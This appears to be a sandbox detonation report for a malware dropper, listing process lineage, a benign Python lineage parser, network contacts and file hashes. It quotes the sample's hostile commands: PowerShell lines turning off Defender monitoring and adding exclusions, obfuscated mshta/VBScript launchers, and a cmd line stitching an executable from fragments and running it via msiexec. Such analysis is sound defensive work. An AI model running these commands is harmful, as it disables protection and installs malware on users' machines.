PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2588 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
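The WriteProcessMemory rows above are the most reliable lineage record in this detonation: every row names a writer PID and a target PID together with both images, and the sandbox emits one row per write, so the same parent/child pair repeats several times. The Python below, an added example that is not the sandbox's own tooling, parses those rows into a parent map, collapses the repeats into a write count and prints the tree plus the ancestry of any PID. The sample rows are copied from this report (one duplicate kept on purpose); the row grammar it assumes is exactly the one shown in the table.

```python
"""Rebuild process lineage from 'PID A wrote to memory of B' sandbox rows.
Added example, not part of the report; SAMPLE_ROWS is copied from the
WriteProcessMemory table above with one duplicate kept to exercise de-duplication."""
import re
from collections import Counter, defaultdict

# Row grammar as printed in the report: writer PID, target PID, "N/A" indicator,
# writer image, target image.  Both images are whitespace-free paths here.
ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (\S+) (\S+)$")

# Constructed sample: a subset of the table's rows, verbatim.
SAMPLE_ROWS = r"""
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 2348 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe
PID 1660 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1660 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2608 wrote to memory of 2824 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1660 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
"""


def parse_rows(text):
    """Return (parent_of, image_of, writes): child->parent, pid->image, Counter of (parent, child)."""
    parent_of, image_of, writes = {}, {}, Counter()
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # tolerate header or blank lines pasted from the report
        src, dst, src_img, dst_img = m.groups()
        src, dst = int(src), int(dst)
        parent_of[dst] = src
        image_of.setdefault(src, src_img)
        image_of.setdefault(dst, dst_img)
        writes[(src, dst)] += 1  # repeated rows become a count instead of duplicate edges
    return parent_of, image_of, writes


def lineage(parent_of, pid):
    """Ancestry of pid from the root down, e.g. [2348, 1660, 2844, 2764]."""
    chain, seen = [pid], {pid}
    while chain[-1] in parent_of:
        parent = parent_of[chain[-1]]
        if parent in seen:
            break  # defensive: a cycle can only come from malformed input
        seen.add(parent)
        chain.append(parent)
    return chain[::-1]


def basename(path):
    # Windows path; os.path.basename would not split on '\\' when run on Linux.
    return path.rsplit("\\", 1)[-1]


def render_tree(parent_of, image_of, writes):
    """Indented tree, children sorted by PID, with the write count on each edge."""
    children = defaultdict(list)
    for child, parent in parent_of.items():
        children[parent].append(child)
    roots = sorted(p for p in image_of if p not in parent_of)
    lines = []

    def walk(pid, depth):
        suffix = ""
        if pid in parent_of:
            suffix = f"  ({writes[(parent_of[pid], pid)]} writes)"
        lines.append(f"{'  ' * depth}{pid} {basename(image_of[pid])}{suffix}")
        for child in sorted(children[pid]):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return "\n".join(lines)


if __name__ == "__main__":
    parent_of, image_of, writes = parse_rows(SAMPLE_ROWS)
    print(render_tree(parent_of, image_of, writes))
    print("lineage of 2764:", lineage(parent_of, 2764))
```

The write counts are worth keeping: a launcher that spawns a child normally produces a handful of writes (the CreateProcess plumbing), whereas a process being hollowed shows a much larger number against a single target, so the count separates the two without needing the memory contents.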

Processes

C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0983917533e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed091bab77a3bb62d.exe

Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0944361c3621a67a6.exe

Wed0944361c3621a67a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe

Wed090db89ca4c58.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0983917533e.exe

Wed0983917533e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe

Wed0900caa0501dc98f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09ed6b36e57df5f.exe

Wed09ed6b36e57df5f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 272

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09d761ab4704dd931.exe

Wed09d761ab4704dd931.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe

Wed09f69eef9c0d5b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

Wed09755e77ed017e8af.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09c4c0c3d01.exe

Wed09c4c0c3d01.exe

C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VI453.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$3017E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-N3SJ1.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$40166,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09f69eef9c0d5b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed090db89ca4c58.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1660 -s 464

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0968d19e5ec37794.exe

Network

Country  Destination            Domain                        Proto
NL       45.133.1.107:80        -                             tcp
US       8.8.8.8:53             wensela.xyz                   udp
US       8.8.8.8:53             t.gogamec.com                 udp
NL       45.133.1.107:80        -                             tcp
US       8.8.8.8:53             ip-api.com                    udp
US       208.95.112.1:80        ip-api.com                    tcp
US       8.8.8.8:53             propanla.com                  udp
US       8.8.8.8:53             cdn.discordapp.com            udp
US       8.8.8.8:53             niemannbest.me                udp
US       162.159.134.233:443    cdn.discordapp.com            tcp
US       8.8.8.8:53             all-mobile-pa1ments.com.mx    udp
US       8.8.8.8:53             buy-fantasy-football.com.sg   udp
US       8.8.8.8:53             topniemannpickshop.cc         udp
FI       135.181.129.119:4805   -                             tcp
FR       91.121.67.60:2151      -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
US       8.8.8.8:53             pastebin.com                  udp
US       104.20.4.235:443       pastebin.com                  tcp
US       104.20.4.235:443       pastebin.com                  tcp
NL       194.104.136.5:46013    -                             tcp
US       8.8.8.8:53             wfsdragon.ru                  udp
US       8.8.8.8:53             iplogger.org                  udp
US       172.67.133.215:80      wfsdragon.ru                  tcp
US       172.67.133.215:80      wfsdragon.ru                  tcp
US       172.67.74.161:443      iplogger.org                  tcp
FR       51.178.186.149:80      -                             tcp
FR       51.178.186.149:80      -                             tcp
US       172.67.74.161:443      iplogger.org                  tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
FR       91.121.67.60:2151      -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
N/A      127.0.0.1:49285        -                             tcp
N/A      127.0.0.1:49287        -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
US       72.84.118.132:8080     -                             tcp
FI       135.181.129.119:4805   -                             tcp
FI       135.181.129.119:4805   -                             tcp
FR       91.121.67.60:2151      -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
US       72.84.118.132:8080     -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FR       91.121.67.60:2151      -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
US       8.8.8.8:53             futurepreneurs.eu             udp
LT       92.61.37.60:443        futurepreneurs.eu             tcp
US       8.8.8.8:53             r11.o.lencr.org               udp
GB       2.23.210.75:80         r11.o.lencr.org               tcp
US       8.8.8.8:53             www.qxsgxd.com                udp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FR       91.121.67.60:2151      -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
US       8.8.8.8:53             crl.microsoft.com             udp
GB       2.19.117.22:80         crl.microsoft.com             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FR       91.121.67.60:2151      -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp
FI       135.181.129.119:4805   -                             tcp
NL       194.104.136.5:46013    -                             tcp

Files

\Users\Admin\AppData\Local\Temp\7zSC2959AD6\setup_install.exe

MD5 b742c566607929a9735af5c299846051
SHA1 09be99b3b9d2d7c834f1018fa431be9a40f30c87
SHA256 cdea7bfa75a3bc43c888e945754e11ff3d9db4ad5348898a751e5bc274f4cde7
SHA512 33aa9956aec500a3c398bcea53624754bd8d5db4b0ed5e8552269c8f2f37a379041eeda0d7155124ac780dd46944e0bc968db875d1fac6d32544b781b07d7188

memory/1660-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1660-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5358IQKJBN6KCLP314H1.temp

MD5 d52e24ca7714485c44c0039c722dab94
SHA1 475cff02c9e8c906b4334c5dbd6f8685ae4ef483
SHA256 362809722710375ea7fa946914e168170a7fb63fd224679c36c7123e09878386
SHA512 08ae298c717f268c8339ef96b816363a4f8f2c1a1309209e4b6e40c6e53a338722a71bf7b824cd9d66746cb68e2ed86878259a2b0da1c179c3dd619f07b86ebe

C:\Users\Admin\AppData\Local\Temp\7zSC2959AD6\Wed0900caa0501dc98f.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
